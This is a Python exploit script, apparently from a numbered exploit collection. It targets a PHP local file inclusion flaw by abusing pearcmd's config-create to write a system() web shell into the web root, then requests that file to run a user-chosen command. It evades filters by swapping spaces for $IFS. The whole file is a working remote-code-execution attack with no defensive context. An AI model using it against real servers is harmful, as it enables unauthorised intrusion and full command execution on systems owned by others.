EXPLOITS/39-exploit_LFIStaticExtension.php7.2.py

#!/usr/bin/python3
import argparse, http.client

def UserParse():
    parser = argparse.ArgumentParser()
    parser.add_argument('-t', '--target', type=str, help='Target hostname/ip to exploit')
    parser.add_argument('-c', '--cmd', type=str, help='Command to execute', default='id')
    parser.add_argument('-f', '--filename', type=str, help='Command to execute', default='rce.php')

    return parser.parse_args()

#Setup Exploit conf:
opt = UserParse()

if opt.target is None or opt.cmd is None or opt.filename is None:
    print(":: Invalid arguments")
    exit(1)

print(":: Exploit options: Target:%s" % opt.target)

cmd = str(opt.cmd).replace(' ', '$IFS')


payload = f'?+config-create+/&page=../../../../../../../../usr/local/lib/php/pearcmd&/<?=system(\'{cmd}\');die?>+/var/www/html/{opt.filename}'

print(":: final payload:", payload)

#Exploit process:
conn = http.client.HTTPConnection(opt.target, 80)
conn.request('GET', payload)
conn.getresponse()
conn.close()


#Trigger the php file and executed the command provided by the user:
conn.request('GET', f'/{opt.filename}')
resp = conn.getresponse().read().decode()

result = '\n'.join( resp.split("\n")[2:] )
print(f'''------------\n{result}\n------------''')

conn.close()